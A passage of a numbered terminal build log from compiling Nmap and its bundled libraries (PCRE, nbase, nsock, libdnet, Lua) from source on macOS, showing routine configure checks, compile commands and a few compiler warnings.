  1338. checking dirent.h presence... yes
  1339. checking for dirent.h... yes
  1340. checking windows.h usability... no
  1341. checking windows.h presence... no
  1342. checking for windows.h... no
  1343. checking for an ANSI C-conforming const... yes
  1344. checking for size_t... yes
  1345. checking for long long... yes
  1346. checking for unsigned long long... yes
  1347. checking for bcopy... yes
  1348. checking for memmove... yes
  1349. checking for strerror... yes
  1350. checking for strtoq... yes
  1351. checking for strtoll... yes
  1352. checking for _strtoi64... no
  1353. checking zlib.h usability... yes
  1354. checking zlib.h presence... yes
  1355. checking for zlib.h... yes
  1356. checking for gzopen in -lz... yes
  1357. checking bzlib.h usability... yes
  1358. checking bzlib.h presence... yes
  1359. checking for bzlib.h... yes
  1360. checking for BZ2_bzopen in -lbz2... yes
  1361. checking readline/readline.h usability... yes
  1362. checking readline/readline.h presence... yes
  1363. checking for readline/readline.h... yes
  1364. checking readline/history.h usability... yes
  1365. checking readline/history.h presence... yes
  1366. checking for readline/history.h... yes
  1367. checking for readline in -lreadline... yes
  1368. checking build system type... x86_64-apple-darwin17.2.0
  1369. checking host system type... x86_64-apple-darwin17.2.0
  1370. configure: creating ./config.status
  1371. /bin/sh ./config.status
  1372. config.status: creating Makefile
  1373. config.status: creating pcre-config
  1374. config.status: creating config.h
  1375. config.status: config.h is unchanged
  1376. config.status: executing depfiles commands
  1377. config.status: executing script-chmod commands
  1378. cd . && /bin/sh /Users/osx/Documents/nmap/missing --run autoheader
  1379. /Users/osx/Documents/nmap/missing: line 52: autoheader: command not found
  1380. WARNING: `autoheader' is missing on your system.  You should only need it if
  1381.         you modified `acconfig.h' or `configure.ac'.  You might want
  1382.         to install the `Autoconf' and `GNU m4' packages.  Grab them
  1383.         from any GNU archive site.
  1384. rm -f stamp-h1
  1385. touch config.h.in
  1386. cd . && /bin/sh ./config.status config.h
  1387. config.status: creating config.h
  1388. config.status: config.h is unchanged
  1389. /Library/Developer/CommandLineTools/usr/bin/make  all-am
  1390. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_compile.o -MD -MP -MF .deps/pcre_compile.Tpo -c -o pcre_compile.o pcre_compile.c
  1391. mv -f .deps/pcre_compile.Tpo .deps/pcre_compile.Po
  1392. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_config.o -MD -MP -MF .deps/pcre_config.Tpo -c -o pcre_config.o pcre_config.c
  1393. mv -f .deps/pcre_config.Tpo .deps/pcre_config.Po
  1394. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_dfa_exec.o -MD -MP -MF .deps/pcre_dfa_exec.Tpo -c -o pcre_dfa_exec.o pcre_dfa_exec.c
  1395. mv -f .deps/pcre_dfa_exec.Tpo .deps/pcre_dfa_exec.Po
  1396. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_exec.o -MD -MP -MF .deps/pcre_exec.Tpo -c -o pcre_exec.o pcre_exec.c
  1397. mv -f .deps/pcre_exec.Tpo .deps/pcre_exec.Po
  1398. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_fullinfo.o -MD -MP -MF .deps/pcre_fullinfo.Tpo -c -o pcre_fullinfo.o pcre_fullinfo.c
  1399. mv -f .deps/pcre_fullinfo.Tpo .deps/pcre_fullinfo.Po
  1400. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_get.o -MD -MP -MF .deps/pcre_get.Tpo -c -o pcre_get.o pcre_get.c
  1401. mv -f .deps/pcre_get.Tpo .deps/pcre_get.Po
  1402. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_globals.o -MD -MP -MF .deps/pcre_globals.Tpo -c -o pcre_globals.o pcre_globals.c
  1403. mv -f .deps/pcre_globals.Tpo .deps/pcre_globals.Po
  1404. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_info.o -MD -MP -MF .deps/pcre_info.Tpo -c -o pcre_info.o pcre_info.c
  1405. mv -f .deps/pcre_info.Tpo .deps/pcre_info.Po
  1406. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_maketables.o -MD -MP -MF .deps/pcre_maketables.Tpo -c -o pcre_maketables.o pcre_maketables.c
  1407. mv -f .deps/pcre_maketables.Tpo .deps/pcre_maketables.Po
  1408. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_newline.o -MD -MP -MF .deps/pcre_newline.Tpo -c -o pcre_newline.o pcre_newline.c
  1409. mv -f .deps/pcre_newline.Tpo .deps/pcre_newline.Po
  1410. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_ord2utf8.o -MD -MP -MF .deps/pcre_ord2utf8.Tpo -c -o pcre_ord2utf8.o pcre_ord2utf8.c
  1411. mv -f .deps/pcre_ord2utf8.Tpo .deps/pcre_ord2utf8.Po
  1412. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_refcount.o -MD -MP -MF .deps/pcre_refcount.Tpo -c -o pcre_refcount.o pcre_refcount.c
  1413. mv -f .deps/pcre_refcount.Tpo .deps/pcre_refcount.Po
  1414. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_study.o -MD -MP -MF .deps/pcre_study.Tpo -c -o pcre_study.o pcre_study.c
  1415. mv -f .deps/pcre_study.Tpo .deps/pcre_study.Po
  1416. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_tables.o -MD -MP -MF .deps/pcre_tables.Tpo -c -o pcre_tables.o pcre_tables.c
  1417. mv -f .deps/pcre_tables.Tpo .deps/pcre_tables.Po
  1418. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_try_flipped.o -MD -MP -MF .deps/pcre_try_flipped.Tpo -c -o pcre_try_flipped.o pcre_try_flipped.c
  1419. mv -f .deps/pcre_try_flipped.Tpo .deps/pcre_try_flipped.Po
  1420. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_ucp_searchfuncs.o -MD -MP -MF .deps/pcre_ucp_searchfuncs.Tpo -c -o pcre_ucp_searchfuncs.o pcre_ucp_searchfuncs.c
  1421. mv -f .deps/pcre_ucp_searchfuncs.Tpo .deps/pcre_ucp_searchfuncs.Po
  1422. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_valid_utf8.o -MD -MP -MF .deps/pcre_valid_utf8.Tpo -c -o pcre_valid_utf8.o pcre_valid_utf8.c
  1423. mv -f .deps/pcre_valid_utf8.Tpo .deps/pcre_valid_utf8.Po
  1424. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_version.o -MD -MP -MF .deps/pcre_version.Tpo -c -o pcre_version.o pcre_version.c
  1425. mv -f .deps/pcre_version.Tpo .deps/pcre_version.Po
  1426. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_xclass.o -MD -MP -MF .deps/pcre_xclass.Tpo -c -o pcre_xclass.o pcre_xclass.c
  1427. mv -f .deps/pcre_xclass.Tpo .deps/pcre_xclass.Po
  1428. gcc -DHAVE_CONFIG_H -I.     -O2 -MT pcre_chartables.o -MD -MP -MF .deps/pcre_chartables.Tpo -c -o pcre_chartables.o pcre_chartables.c
  1429. mv -f .deps/pcre_chartables.Tpo .deps/pcre_chartables.Po
  1430. rm -f libpcre.a
  1431. ar cru libpcre.a pcre_compile.o pcre_config.o pcre_dfa_exec.o pcre_exec.o pcre_fullinfo.o pcre_get.o pcre_globals.o pcre_info.o pcre_maketables.o pcre_newline.o pcre_ord2utf8.o pcre_refcount.o pcre_study.o pcre_tables.o pcre_try_flipped.o pcre_ucp_searchfuncs.o pcre_valid_utf8.o pcre_version.o pcre_xclass.o pcre_chartables.o
  1432. ranlib libpcre.a
  1433. Compiling libnbase
  1434. cd nbase && /Library/Developer/CommandLineTools/usr/bin/make
  1435. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o snprintf.o snprintf.c
  1436. snprintf.c:51:19: warning: unused variable 'rcsid' [-Wunused-const-variable]
  1437. static const char rcsid[] =
  1438.                  ^
  1439. 1 warning generated.
  1440. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o nbase_str.o nbase_str.c
  1441. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o nbase_misc.o nbase_misc.c
  1442. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o nbase_memalloc.o nbase_memalloc.c
  1443. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o nbase_rnd.o nbase_rnd.c
  1444. gcc -g -O2 -Wall    -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2    -c -o nbase_addrset.o nbase_addrset.c
  1445. rm -f libnbase.a
  1446. ar cr libnbase.a snprintf.o nbase_str.o nbase_misc.o nbase_memalloc.o nbase_rnd.o nbase_addrset.o
  1447. ranlib libnbase.a
  1448. Compiling libnsock
  1449. cd nsock/src && /Library/Developer/CommandLineTools/usr/bin/make
  1450. gcc -MM -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include error.c filespace.c gh_heap.c nsock_connect.c nsock_core.c nsock_iod.c nsock_read.c nsock_timers.c nsock_write.c nsock_ssl.c nsock_event.c nsock_pool.c netutils.c nsock_pcap.c nsock_engines.c engine_select.c engine_epoll.c engine_kqueue.c engine_poll.c nsock_proxy.c nsock_log.c proxy_http.c proxy_socks4.c > makefile.dep
  1451. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   error.c -o error.o
  1452. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   filespace.c -o filespace.o
  1453. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   gh_heap.c -o gh_heap.o
  1454. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_connect.c -o nsock_connect.o
  1455. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_core.c -o nsock_core.o
  1456. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_iod.c -o nsock_iod.o
  1457. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_read.c -o nsock_read.o
  1458. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_timers.c -o nsock_timers.o
  1459. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_write.c -o nsock_write.o
  1460. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_ssl.c -o nsock_ssl.o
  1461. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_event.c -o nsock_event.o
  1462. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_pool.c -o nsock_pool.o
  1463. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   netutils.c -o netutils.o
  1464. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_pcap.c -o nsock_pcap.o
  1465. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_engines.c -o nsock_engines.o
  1466. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   engine_select.c -o engine_select.o
  1467. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   engine_epoll.c -o engine_epoll.o
  1468. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   engine_kqueue.c -o engine_kqueue.o
  1469. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   engine_poll.c -o engine_poll.o
  1470. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_proxy.c -o nsock_proxy.o
  1471. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   nsock_log.c -o nsock_log.o
  1472. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   proxy_http.c -o proxy_http.o
  1473. gcc -c -I/Users/osx/Documents/nmap/nbase -DHAVE_CONFIG_H -DNSOCK_VERSION=\"0.02\" -D_FORTIFY_SOURCE=2 -I../include -g -O2 -Wall   proxy_socks4.c -o proxy_socks4.o
  1474. rm -f libnsock.a
  1475. ar cr libnsock.a error.o filespace.o gh_heap.o nsock_connect.o nsock_core.o nsock_iod.o nsock_read.o nsock_timers.o nsock_write.o nsock_ssl.o nsock_event.o nsock_pool.o netutils.o nsock_pcap.o nsock_engines.o engine_select.o engine_epoll.o engine_kqueue.o engine_poll.o nsock_proxy.o nsock_log.o proxy_http.o proxy_socks4.o
  1476. /Library/Developer/CommandLineTools/usr/bin/ranlib: file: libnsock.a(engine_epoll.o) has no symbols
  1477. ranlib libnsock.a
  1478. /Library/Developer/CommandLineTools/usr/bin/ranlib: file: libnsock.a(engine_epoll.o) has no symbols
  1479. Compiling libdnet
  1480. Making all in include
  1481. /Library/Developer/CommandLineTools/usr/bin/make  all-recursive
  1482. Making all in dnet
  1483. make[4]: Nothing to be done for `all'.
  1484. make[4]: Nothing to be done for `all-am'.
  1485. Making all in src
  1486. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o addr-util.lo addr-util.c
  1487. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c addr-util.c -o addr-util.o
  1488. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o addr.lo addr.c
  1489. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c addr.c -o addr.o
  1490. addr.c:352:7: warning: overflow converting case value to switch condition type
  1491.      (65535 to 255) [-Wswitch]
  1492.        case ARP_HRD_VOID:
  1493.             ^
  1494. ../include/dnet/arp.h:47:22: note: expanded from macro 'ARP_HRD_VOID'
  1495. #define ARP_HRD_VOID 0xFFFF                     /* Void type, nothing i...
  1496.                     ^
  1497. addr.c:327:7: warning: overflow converting case value to switch condition type
  1498.      (803 to 35) [-Wswitch]
  1499.        case ARP_HRD_IEEE80211_RADIOTAP: /* IEEE 802.11 + radiotap header */
  1500.             ^
  1501. ../include/dnet/arp.h:46:36: note: expanded from macro
  1502.      'ARP_HRD_IEEE80211_RADIOTAP'
  1503. #define ARP_HRD_IEEE80211_RADIOTAP 0x0323  /* IEEE 802.11 + radiotap header */
  1504.                                   ^
  1505. addr.c:326:7: warning: overflow converting case value to switch condition type
  1506.      (802 to 34) [-Wswitch]
  1507.        case ARP_HRD_IEEE80211_PRISM: /* IEEE 802.11 + prism header */
  1508.             ^
  1509. ../include/dnet/arp.h:45:33: note: expanded from macro 'ARP_HRD_IEEE80211_PRISM'
  1510. #define ARP_HRD_IEEE80211_PRISM 0x0322  /* IEEE 802.11 + prism header */
  1511.                                ^
  1512. addr.c:325:7: warning: overflow converting case value to switch condition type
  1513.      (801 to 33) [-Wswitch]
  1514.        case ARP_HDR_IEEE80211: /* IEEE 802.11 */
  1515.             ^
  1516. ../include/dnet/arp.h:44:27: note: expanded from macro 'ARP_HDR_IEEE80211'
  1517. #define ARP_HDR_IEEE80211 0x0321  /* IEEE 802.11 */
  1518.                          ^
  1519. addr.c:323:7: warning: overflow converting case value to switch condition type
  1520.      (777 to 9) [-Wswitch]
  1521.        case ARP_HRD_APPLETALK: /* AppleTalk DDP */
  1522.             ^
  1523. ../include/dnet/arp.h:43:27: note: expanded from macro 'ARP_HRD_APPLETALK'
  1524. #define ARP_HRD_APPLETALK 0x0309 /* AppleTalk DDP */
  1525.                          ^
  1526. 5 warnings generated.
  1527. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o blob.lo blob.c
  1528. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c blob.c -o blob.o
  1529. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o ip-util.lo ip-util.c
  1530. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c ip-util.c -o ip-util.o
  1531. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o ip6.lo ip6.c
  1532. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c ip6.c -o ip6.o
  1533. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o rand.lo rand.c
  1534. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c rand.c -o rand.o
  1535. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o arp-bsd.lo arp-bsd.c
  1536. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c arp-bsd.c -o arp-bsd.o
  1537. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o eth-bsd.lo eth-bsd.c
  1538. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c eth-bsd.c -o eth-bsd.o
  1539. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o fw-none.lo fw-none.c
  1540. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c fw-none.c -o fw-none.o
  1541. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o intf.lo intf.c
  1542. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c intf.c -o intf.o
  1543. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o ip.lo ip.c
  1544. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c ip.c -o ip.o
  1545. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o route-bsd.lo route-bsd.c
  1546. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c route-bsd.c -o route-bsd.o
  1547. /bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../include  -I../include   -g -O2 -Wall -c -o tun-none.lo tun-none.c
  1548. libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../include -I../include -g -O2 -Wall -c tun-none.c -o tun-none.o
  1549. /bin/sh ../libtool --tag=CC   --mode=link gcc  -g -O2 -Wall -version-info 1:1:0  -o libdnet.la -rpath /usr/local/lib addr-util.lo addr.lo blob.lo ip-util.lo ip6.lo rand.lo arp-bsd.lo eth-bsd.lo fw-none.lo intf.lo ip.lo route-bsd.lo tun-none.lo
  1550. libtool: link: ar cru .libs/libdnet.a  addr-util.o addr.o blob.o ip-util.o ip6.o rand.o arp-bsd.o eth-bsd.o fw-none.o intf.o ip.o route-bsd.o tun-none.o
  1551. libtool: link: ranlib .libs/libdnet.a
  1552. libtool: link: ( cd ".libs" && rm -f "libdnet.la" && ln -s "../libdnet.la" "libdnet.la" )
  1553. make[2]: Nothing to be done for `all-am'.
  1554. Compiling liblua
  1555. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lapi.o lapi.c
  1556. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lcode.o lcode.c
  1557. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lctype.o lctype.c
  1558. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ldebug.o ldebug.c
  1559. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ldo.o ldo.c
  1560. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ldump.o ldump.c
  1561. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lfunc.o lfunc.c
  1562. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lgc.o lgc.c
  1563. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o llex.o llex.c
  1564. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lmem.o lmem.c
  1565. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lobject.o lobject.c
  1566. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lopcodes.o lopcodes.c
  1567. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lparser.o lparser.c
  1568. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lstate.o lstate.c
  1569. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lstring.o lstring.c
  1570. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ltable.o ltable.c
  1571. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ltm.o ltm.c
  1572. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lundump.o lundump.c
  1573. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lvm.o lvm.c
  1574. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lzio.o lzio.c
  1575. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lauxlib.o lauxlib.c
  1576. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lbaselib.o lbaselib.c
  1577. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lbitlib.o lbitlib.c
  1578. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lcorolib.o lcorolib.c
  1579. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ldblib.o ldblib.c
  1580. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o liolib.o liolib.c
  1581. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lmathlib.o lmathlib.c
  1582. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o loslib.o loslib.c
  1583. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lstrlib.o lstrlib.c
  1584. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o ltablib.o ltablib.c
  1585. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o lutf8lib.o lutf8lib.c
  1586. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o loadlib.o loadlib.c
  1587. gcc -O2 -Wall -Wextra -DLUA_COMPAT_5_2  -g -O2 -Wall   -DLUA_USE_MACOSX   -c -o linit.o linit.c
  1588. ar rcu liblua.a lapi.o lcode.o lctype.o ldebug.o ldo.o ldump.o lfunc.o lgc.o llex.o lmem.o lobject.o lopcodes.o lparser.o lstate.o lstring.o ltable.o ltm.o lundump.o lvm.o lzio.o lauxlib.o lbaselib.o lbitlib.o lcorolib.o ldblib.o liolib.o lmathlib.o loslib.o lstrlib.o ltablib.o lutf8lib.o loadlib.o linit.o
  1589. ranlib liblua.a
  1590. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   charpool.cc -o charpool.o
  1591. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   FingerPrintResults.cc -o FingerPrintResults.o
  1592. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   FPEngine.cc -o FPEngine.o
  1593. g++ -c -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing   -g0 FPModel.cc -o FPModel.o
